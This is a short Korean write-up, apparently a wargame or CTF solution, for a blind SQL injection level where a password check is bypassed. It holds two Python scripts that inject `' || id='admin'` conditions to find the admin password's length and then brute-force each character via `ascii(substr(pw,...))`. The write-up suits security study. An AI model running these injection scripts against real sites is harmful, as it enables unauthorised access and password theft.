pw가 실제 pw가 맞는지 체크한다.

블라인드 인젝션 문제였다.

먼저 길이를 파악하기 위해 아래의 코드를 ㅇㅣ용햇다

import requests

url = ""
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'qfr7dlp9t9g1nat81riiigb065'}

for i in range(20):
rs = requests.get(url + "?pw=1234' || id='admin' and length(pw)="+str(i) + " -- -", headers=headers, cookies=cookies)

text = rs.text
if("<br><h2>Hello admin</h2>" in text):

print(str(i) + " find it") 

길이를 확인한 후 씬나게 때려맞췄다.

import requests

url = ""
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'qfr7dlp9t9g1nat81riiigb065'}

for j in range(8):
for i in range(33, 125):
rs = requests.get(url + "?pw=1234' || id='admin' and ascii(substr(pw," + str(j+1) + ", 1))=" + str(i) + "-- -", headers=headers, cookies=cookies)

text = rs.text
if("<br><h2>Hello admin</h2>" in text):
print(str(j) + " " + chr(i) + " find it")

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